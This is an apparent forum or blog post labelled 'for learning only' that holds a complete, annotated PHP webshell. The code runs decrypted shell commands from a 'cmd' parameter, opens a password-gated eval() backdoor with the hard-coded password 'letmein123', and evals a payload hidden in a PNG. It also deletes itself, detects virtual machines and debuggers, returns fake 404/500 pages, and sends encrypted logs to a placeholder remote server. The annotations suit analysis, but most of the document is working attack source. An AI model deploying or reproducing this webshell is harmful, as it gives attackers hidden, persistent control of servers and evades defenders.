JOJO朦

H4ckBu7eer

特级 APT 级 Webshell - 强化版

仅供学习

<?php

// Annotated webshell sample. The comments describe what each section does as
// written; every file name, request parameter, host and command mentioned is
// the one the code itself uses.


// --- Access gate: a static IP allowlist, then two lookups against the
// external ip-api.com service (outbound HTTP for every non-allowlisted client).
// deceiveUser() terminates the request only in its 404 branch, so a gated
// request can continue past this point (see deceiveUser() below).

$allowedIPs = ['127.0.0.1', '192.168.1.100'];

$clientIP = $_SERVER['REMOTE_ADDR'];

if (!in_array($clientIP, $allowedIPs) && !isValidGeoIP($clientIP) && !isProxyIP($clientIP)) {

    deceiveUser();

}


// AES key initialisation: one hex key/IV pair per PHP session, taken from the
// AES_KEY / AES_IV environment variables when set, otherwise random. Both
// values live in $_SESSION, i.e. in whatever session store PHP is configured
// with — which is where they can be recovered from during analysis.

session_start();

if (!isset($_SESSION['aes_key'])) {

    $_SESSION['aes_key'] = getenv('AES_KEY') ?: bin2hex(random_bytes(32));

    $_SESSION['aes_iv'] = getenv('AES_IV') ?: bin2hex(random_bytes(16));

}

$aesKey = $_SESSION['aes_key'];

$aesIV = $_SESSION['aes_iv'];

// Hard-coded credential compared against the `pass` parameter in the `hidden`
// handler further down.
$backdoorPass = 'letmein123';


// Self-destruct mechanism: removes this script once its mtime is more than an
// hour old (so the dropped file is expected to vanish within an hour of being
// written unless its mtime is refreshed), or when $_SESSION['error_count']
// exceeds 5 — nothing in this listing writes that key. `&&` binds tighter than
// `||`, so the condition is "stale OR (count set AND > 5)". The unlink is
// @-suppressed, so a failed delete leaves no trace in the PHP error log.

if (time() - filemtime(__FILE__) > 3600 || isset($_SESSION['error_count']) && $_SESSION['error_count'] > 5) {

    @unlink(__FILE__);

    deceiveUser();

}


// Anti-sandbox and virtual-machine detection. isVirtualEnvironment() spawns
// wmic / getmac / tasklist via shell_exec on every request that reaches here,
// which is a visible process-creation artefact of this sample.

if (isDebuggerPresent() || isVirtualEnvironment() || isSuspiciousBehavior($clientIP)) {

    deceiveUser();

}


// Command execution and file inclusion

if (isset($_GET['cmd'])) {

    sleep(rand(1, 5)); // simulated delay — the 1–5 s response jitter is itself a timing artefact

    // `cmd` is base64-decoded here and decryptData() base64-decodes again
    // internally (openssl_decrypt with options=0 expects base64 input).
    $decryptedCmd = decryptData(base64_decode($_GET['cmd']), $aesKey, $aesIV);

    // Character allowlist [A-Za-z0-9_- ]; a hit calls deceiveUser().
    if (preg_match('/[^a-zA-Z0-9_\- ]/', $decryptedCmd)) {

        deceiveUser();

    }

    // Empty or null command output is replaced by the literal string below,
    // then the response is AES-encrypted with the session key.
    $output = shell_exec($decryptedCmd) ?: "Execution disabled.";

    echo encryptData($output, $aesKey, $aesIV);

}


if (isset($_GET['file'])) {

    // Unlike `cmd` and `payload`, `file` is handed to decryptData() without a
    // prior base64_decode().
    $file = decryptData($_GET['file'], $aesKey, $aesIV);

    $safeFiles = ['index.php', 'info.php', 'test.php'];

    // Allowlist match (non-strict in_array) and existence relative to the
    // working directory; secureFileInclude() then applies its own realpath check.
    if (in_array($file, $safeFiles) && file_exists($file)) {

        secureFileInclude($file);

    } else {

        deceiveUser();

    }

}


// Backdoor access: `hidden` present and `pass` identical to $backdoorPass
// unlocks eval() of the decrypted `payload` parameter. `pass` is read without
// isset(), so a request carrying `hidden` but no `pass` raises an
// undefined-index warning before the comparison fails. Each trigger is written
// to secure_access.log and uploaded by secureLog().

if (isset($_GET['hidden']) && $_GET['pass'] === $backdoorPass) {

    eval(decryptData(base64_decode($_GET['payload']), $aesKey, $aesIV));

    secureLog("Backdoor triggered by: $clientIP");

}


// Steganographic payload loading: `steg` makes the script read payload.png
// from the working directory and eval() whatever extractHiddenPayload()
// recovers from it. If the file is missing, file_get_contents() returns false
// (with a warning) and extractHiddenPayload() operates on an empty string.

if (isset($_GET['steg'])) {

    $stegImage = 'payload.png';

    $hiddenCode = file_get_contents($stegImage);

    eval(extractHiddenPayload($hiddenCode));

}


// Anti-sandbox check: a second, explicit VM probe on `sandbox`, redundant with
// the unconditional check earlier in the file.

if (isset($_GET['sandbox'])) {

    if (isVirtualEnvironment()) {

        deceiveUser();

    }

}


// Defensive function implementations

/**
 * Gate helper: asks the external ip-api.com service where the client address
 * is located. Called from the top-level gate for clients not on the static
 * allowlist, so each such request produces an outbound plain-HTTP call with
 * the client IP in the path.
 *
 * @param string $ip Client address to look up.
 * @return bool True only when the service reports countryCode "US". On a
 *              failed request file_get_contents() returns false, json_decode()
 *              then yields null and the index read is null, so the result is
 *              false (PHP emits warnings along the way).
 */
function isValidGeoIP($ip) {

    $url = "http://ip-api.com/json/{$ip}";

    $response = json_decode(file_get_contents($url), true);

    return $response['countryCode'] === 'US';

}


/**
 * Gate helper: a second request to the same ip-api.com endpoint, this time
 * reading the "proxy" field of the JSON reply.
 *
 * @param string $ip Client address to look up.
 * @return mixed Whatever the service returns under "proxy", or false when the
 *               field is absent (including when the request or JSON decoding
 *               failed — `??` swallows the null without a warning).
 */
function isProxyIP($ip) {

    $url = "http://ip-api.com/json/{$ip}";

    $response = json_decode(file_get_contents($url), true);

    return $response['proxy'] ?? false;

}


/**
 * Anti-analysis probe: looks for VM / sandbox markers on the host.
 *
 * Reads /proc/cpuinfo (Linux) and spawns three Windows commands through
 * shell_exec — `wmic diskdrive get serialnumber`, `getmac`, `tasklist` —
 * unconditionally, whatever OS is actually running. Where a command does not
 * exist, shell_exec yields null/empty output and that probe simply never
 * matches; the attempted process launches are still observable.
 *
 * @return bool True when any marker matches: "vmware" or "kvm" in cpuinfo,
 *              "000000" in the disk serial output, the VMware OUI 00:50:56 in
 *              the MAC list, or VBoxService / vmtoolsd in the process list.
 */
function isVirtualEnvironment() {

    $cpuInfo = file_get_contents("/proc/cpuinfo");

    $diskInfo = shell_exec('wmic diskdrive get serialnumber');

    $macAddress = shell_exec('getmac');

    $processList = shell_exec('tasklist');


    // Plain substring checks; the process-list check is a case-insensitive regex.
    if (

        strpos($cpuInfo, "vmware") !== false || 

        strpos($cpuInfo, "kvm") !== false || 

        strpos($diskInfo, "000000") !== false || 

        strpos($macAddress, "00:50:56") !== false ||  // VMware MAC

        preg_match('/VBoxService|vmtoolsd/i', $processList)

    ) {

        return true;

    }

    return false;

}


/**
 * Anti-analysis probe: treats a loaded Xdebug extension, or the mere presence
 * of a `debug` query parameter, as a debugger and lets the caller abort.
 *
 * @return bool
 */
function isDebuggerPresent() {

    return extension_loaded('xdebug') || isset($_GET['debug']);

}


// Further strengthens anti-sandbox and anti-debugging; adds detection of various security tools

/**
 * Session-scoped request counter: increments $_SESSION['request_count'] and
 * reports "suspicious" once more than 100 earlier calls have been recorded.
 *
 * Relies on the session_start() at the top of this file; the counter is tied
 * to the session cookie, not to the address — $ip only appears in the log
 * line. A positive result is written to secure_access.log and uploaded by
 * secureLog() before returning.
 *
 * @param string $ip Client address, used in the log message only.
 * @return bool True when the stored count before this call exceeds 100.
 */
function isSuspiciousBehavior($ip) {

    // Detects suspicious request patterns such as brute forcing or very frequent requests.

    $requestCount = isset($_SESSION['request_count']) ? $_SESSION['request_count'] : 0;

    $_SESSION['request_count'] = $requestCount + 1;


    if ($requestCount > 100) {

        // Possibly a brute-force attempt.

        secureLog("Suspicious behavior detected from IP: $ip");

        return true;

    }


    // More elaborate detection logic could be added here later.

    return false;

}


/**
 * Cover response emitted whenever a gate fails. The outcome is chosen by rand():
 *  - rand(1,10) > 7 (about 30% of calls): echoes an "Error 500" string and
 *    returns, so the caller continues executing; the HTTP status is not
 *    changed, so the response is still 200.
 *  - otherwise: sets HTTP 404 and die()s with "Page not found.".
 *
 * @return void
 */
function deceiveUser() {

    if (rand(1, 10) > 7) {

        echo "Error 500 - Internal Server Error";

    } else {

        http_response_code(404);

        die("Page not found.");

    }

}


/**
 * Includes $file after resolving it with realpath() and checking that the
 * resolved path begins with this script's directory.
 *
 * The check is a plain string-prefix comparison — no directory separator is
 * appended to __DIR__. When realpath() returns false (file does not exist),
 * strpos(false, ...) can never be 0, so that case also ends in deceiveUser().
 * In this listing the function is reached only through the allowlist in the
 * `file` handler.
 *
 * @param string $file Decrypted, allowlisted file name.
 * @return void
 */
function secureFileInclude($file) {

    $filePath = realpath($file);

    if (strpos($filePath, __DIR__) === 0) {

        include($filePath);

    } else {

        deceiveUser();

    }

}


/**
 * AES-256-CTR encryption of $data after prepending 16 random hex characters
 * (bin2hex of 8 random bytes).
 *
 * $key and $iv are the hex strings kept in the session and are hex2bin'd
 * here: the session default of 64 hex chars gives the 32-byte key AES-256
 * needs, and 32 hex chars give the 16-byte IV; values supplied via AES_KEY /
 * AES_IV must be hex of the same lengths. options=0 makes openssl_encrypt
 * return base64 text. The IV is fixed for the whole session, so every message
 * encrypted in that session shares the same CTR keystream.
 *
 * @param string $data Plaintext.
 * @param string $key  Hex-encoded AES key.
 * @param string $iv   Hex-encoded IV.
 * @return string|false Base64 ciphertext, or false if OpenSSL fails.
 */
function encryptData($data, $key, $iv) {

    $padding = bin2hex(random_bytes(8));  // random prefix: 8 bytes → 16 hex characters

    $data = $padding . $data;

    return openssl_encrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));

}


/**
 * Counterpart of encryptData(): base64-decodes and AES-256-CTR-decrypts $data
 * (options=0, so openssl_decrypt expects base64 input), then drops the first
 * 8 bytes of the plaintext as "padding".
 *
 * Note that encryptData() prepends 16 characters, not 8, so the two are not
 * symmetric as written. On a failed decrypt openssl_decrypt returns false and
 * substr() is applied to an empty string.
 *
 * @param string $data Base64 ciphertext.
 * @param string $key  Hex-encoded AES key.
 * @param string $iv   Hex-encoded IV.
 * @return string Plaintext minus its first 8 bytes ("" when decryption fails).
 */
function decryptData($data, $key, $iv) {

    $decrypted = openssl_decrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));

    return substr($decrypted, 8);  // strip the prefix added by the encrypting side

}


/**
 * Pulls an embedded payload out of a PNG-like byte string: everything after
 * the first "IDAT" marker plus 4 bytes is treated as base64, decoded, and then
 * AES-256-CTR-decrypted with the hard-coded literals 'hidden-layer-key'
 * (16 bytes) and 'hidden-layer-iv' (15 bytes).
 *
 * Both literals are shorter than the 32-byte key / 16-byte IV the cipher
 * takes; how openssl_decrypt pads them (and whether it warns) depends on the
 * PHP version — confirm on the target runtime before relying on it. When
 * "IDAT" is absent, strpos() returns false and the slice starts at offset 4.
 *
 * @param string $image Raw bytes of payload.png as read by the caller.
 * @return string|false Decrypted payload, which the caller passes to eval().
 */
function extractHiddenPayload($image) {

    $stegPayload = substr($image, strpos($image, 'IDAT') + 4);

    $decodedPayload = base64_decode($stegPayload);

    

    // Second decryption layer with fixed key/IV literals (not the session key).

    return openssl_decrypt($decodedPayload, 'AES-256-CTR', 'hidden-layer-key', 0, 'hidden-layer-iv');

}


/**
 * Writes an encrypted log line locally and sends a copy to a remote host.
 *
 * Uses the top-level $aesKey / $aesIV via `global`, appends the base64
 * ciphertext to secure_access.log (a path relative to the working directory,
 * so typically beside this script), then issues an outbound GET to a
 * hard-coded URL with the line and a Unix timestamp in the query string.
 * Neither the file write nor the request is error-checked. Artefacts: the
 * local log file and the request to your-log-server.com (a placeholder host
 * in this listing).
 *
 * @param string $logMessage Plaintext message.
 * @return void
 */
function secureLog($logMessage) {

    global $aesKey, $aesIV;

    $encryptedLog = encryptData($logMessage, $aesKey, $aesIV);

    file_put_contents('secure_access.log', $encryptedLog . "\n", FILE_APPEND);

    

    // Remote log upload: the same line is exfiltrated over plain HTTP.

    $logData = [

        'log' => $encryptedLog,

        'timestamp' => time(),

    ];

    $remoteUrl = 'http://your-log-server.com/upload';

    file_get_contents($remoteUrl . '?' . http_build_query($logData));

}


// Monitoring for brute-force attempts and abnormal behaviour patterns

/**
 * Stub: always reports "not suspicious". Nothing in this listing calls it —
 * the live gates use isSuspiciousBehavior() instead.
 *
 * @param string $ip Unused.
 * @return bool Always false.
 */
function isSuspiciousRequestPattern($ip) {

    // Specific detection logic (e.g. abnormal request frequency) could go here.

    return false;  // placeholder; more checks could be added

}


?>

